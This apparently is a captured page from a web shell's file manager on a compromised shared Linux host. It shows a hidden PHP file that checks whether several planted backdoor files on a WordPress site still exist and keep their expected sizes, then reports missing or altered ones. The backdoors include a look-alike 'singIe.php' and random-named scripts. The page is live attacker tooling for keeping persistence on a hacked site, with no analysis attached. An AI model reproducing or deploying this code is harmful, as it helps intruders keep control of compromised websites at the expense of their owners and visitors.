HEX
Server: Apache
System: Linux iad1-shared-b8-33 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: samfetchero1 (10301780)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //var/tmp/.oauthexceptions
<?php   $r = '/home/ricago/theagostins.com'; $x = ["/wp-content/themes/config_1751700554/singIe.php"=>"bd@@447489@@727",
"/wp-content/themes/sketch/inc/custom-header.php"=>"bd@@736841@@5136",
"/e9fd4c.php"=>"bd@@549211@@105",
"/44aa25.php"=>"bd@@540149@@105"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');